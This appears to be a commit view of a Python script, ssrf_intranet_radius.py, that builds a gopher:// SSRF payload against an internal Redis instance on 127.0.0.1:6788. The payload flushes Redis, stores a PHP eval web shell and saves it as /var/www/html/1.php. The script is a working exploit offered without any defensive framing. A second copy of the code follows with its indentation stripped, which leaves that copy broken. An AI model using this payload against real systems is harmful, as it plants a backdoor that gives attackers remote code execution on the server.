OlivierLaflamme · March 29, 2022 00:33
diff --git a/ssrf_intranet_radius.py b/ssrf_intranet_radius.py
 import urllib.parse

 protocol = "gopher://"
 ip = "127.0.0.1"
 port = "6788"  
 shell = "\n\n<?php eval($_POST[\"test\"]);?>\n\n" #
 filename = "1.php"  
 path = "/var/www/html"  
 passwd = ""
 cmd = ["flushall",
     "set 1 {}".format(shell.replace(" ","${IFS}")),  
     "config set dir {}".format(path),
     "config set dbfilename {}".format(filename),
     "save",
     "quit"
    ]
 if passwd:
    cmd.insert(0,"AUTH {}".format(passwd))
 payload = protocol + ip + ":" + port + "/_"
 def redis_format(arr):
    CRLF = "\r\n"
    redis_arr = arr.split(" ")
    cmd = ""
    cmd += "*" + str(len(redis_arr))
    for x in redis_arr:
        cmd += CRLF + "$" + str(len((x.replace("${IFS}"," ")))) + CRLF + x.replace("${IFS}"," ")
    cmd += CRLF
    return cmd

 if __name__=="__main__":
    for x in cmd:
        payload += urllib.parse.quote(redis_format(x))

    # print(payload)
    print(urllib.parse.quote(payload))
	import urllib.parse

	protocol = "gopher://"
	ip = "127.0.0.1"
	port = "6788"
	shell = "\n\n<?php eval($_POST[\"test\"]);?>\n\n" #
	filename = "1.php"
	path = "/var/www/html"
	passwd = ""
	cmd = ["flushall",
	"set 1 {}".format(shell.replace(" ","${IFS}")),
	"config set dir {}".format(path),
	"config set dbfilename {}".format(filename),
	"save",
	"quit"
	]
	if passwd:
	cmd.insert(0,"AUTH {}".format(passwd))
	payload = protocol + ip + ":" + port + "/_"
	def redis_format(arr):
	CRLF = "\r\n"
	redis_arr = arr.split(" ")
	cmd = ""
	cmd += "*" + str(len(redis_arr))
	for x in redis_arr:
	cmd += CRLF + "$" + str(len((x.replace("${IFS}"," ")))) + CRLF + x.replace("${IFS}"," ")
	cmd += CRLF
	return cmd

	if __name__=="__main__":
	for x in cmd:
	payload += urllib.parse.quote(redis_format(x))

	# print(payload)
	print(urllib.parse.quote(payload))